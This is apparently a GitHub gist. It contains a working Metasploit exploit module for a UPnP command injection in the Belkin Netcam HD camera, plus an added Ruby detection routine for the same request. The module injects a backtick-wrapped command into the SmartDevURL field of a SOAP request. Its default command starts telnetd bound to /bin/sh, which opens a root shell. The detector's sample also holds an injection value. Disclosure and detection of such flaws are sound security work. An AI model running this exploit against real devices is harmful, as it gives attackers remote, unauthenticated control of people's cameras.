@phikshun
Created April 4, 2014 22:53
Belkin Netcam HD UPnP Command Injection
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name' => "Belkin Netcam HD UPnP Command Injection",
      'Description' => %q{
        This module injects a shell command into the UPnP SetSmartDevInfo method.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'phikshun <0x41.phikshun@gmail.com>', # Original discovery and Metasploit module
        ],
      'References' =>
        [
          ['URL', 'http://disconnected.io/2014/04/04/universal-plug-and-fuzz/']
        ],
      'Privileged' => true,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic'
            }
        },
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/generic',
          'CMD' => '/usr/sbin/telnetd -l/bin/sh'
        },
      'Targets' =>
        [
          ['Belkin Netcam HD', {}],
        ],
      'DisclosureDate' => "April 04 2014",
      'DefaultTarget' => 0))

    # The camera's UPnP control service listens on TCP 49153.
    register_options(
      [
        Opt::RPORT(49153)
      ], self.class
    )
  end

  def exploit
    print_status('Sending exploit')

    # The SmartDevURL argument is where the backtick-wrapped command is placed.
    soap_payload = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
<SmartDevURL>
`#{payload.encoded}`
</SmartDevURL>
</u:SetSmartDevInfo>
</s:Body>
</s:Envelope>
EOS
    soap_payload.gsub!("\n", "\r\n")

    send_request_cgi({
      'uri' => '/upnp/control/basicevent1',
      'method' => 'POST',
      'ctype' => 'text/xml; charset="utf-8"',
      'headers' => {
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
      },
      'data' => soap_payload
    })

    print_status('Exploit sent - telnet should be wide open')
  end
end
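
A defender-side check for the request this module sends, as an added example that is not part of the gist: it classifies a captured SOAP POST to `/upnp/control/basicevent1` by whether its `SmartDevURL` argument is a plain URL or carries shell metacharacters. The function names, the allowlist pattern and the sample bodies are assumptions constructed for illustration.

```ruby
# Added example, not part of the gist. All names below are hypothetical.
ACTION = 'urn:Belkin:service:basicevent:1#SetSmartDevInfo'
# Assumed allowlist: a plain http(s) URL with no shell-significant characters.
URL_SAFE = %r{\Ahttps?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~%/?=+\-]*)?\z}
SHELL_META = /[`$;|&<>(){}\\'"\s]/
XML_ENTITIES = { '&lt;' => '<', '&gt;' => '>', '&quot;' => '"',
                 '&apos;' => "'", '&amp;' => '&' }.freeze

# Decode the five predefined XML entities in one pass (no double decoding).
def xml_unescape(text)
  text.gsub(/&(?:lt|gt|quot|apos|amp);/, XML_ENTITIES)
end

# Pull the SmartDevURL argument out of a SOAP body; nil when it is absent.
def smart_dev_url(body)
  m = body.match(%r{<SmartDevURL\b[^>]*>(.*?)</SmartDevURL>}m)
  m && xml_unescape(m[1].strip)
end

# Returns :not_applicable, :missing_argument, :shell_metacharacters,
# :malformed_url or :ok for one request (SOAPACTION header value plus body).
def classify_request(soap_action, body)
  return :not_applicable unless soap_action.to_s.delete('"').strip == ACTION
  url = smart_dev_url(body.to_s)
  return :missing_argument if url.nil? || url.empty?
  return :shell_metacharacters if url.match?(SHELL_META)
  url.match?(URL_SAFE) ? :ok : :malformed_url
end

# Constructed sample request body around a given argument value.
def sample_body(value)
  <<~XML
    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
    <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
    <SmartDevURL>
    #{value}
    </SmartDevURL>
    </u:SetSmartDevInfo></s:Body></s:Envelope>
  XML
end

SAMPLE_ACTION = '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
BENIGN = sample_body('http://192.0.2.10/smartdev')    # constructed
INJECTED = sample_body('`echo constructed`')          # constructed

if __FILE__ == $PROGRAM_NAME
  puts classify_request(SAMPLE_ACTION, BENIGN)
  puts classify_request(SAMPLE_ACTION, INJECTED)
end
```

The allowlist is deliberately strict: a URL whose query string contains `&` is reported as `:shell_metacharacters`, so tune `SHELL_META` if legitimate clients on your network send such values.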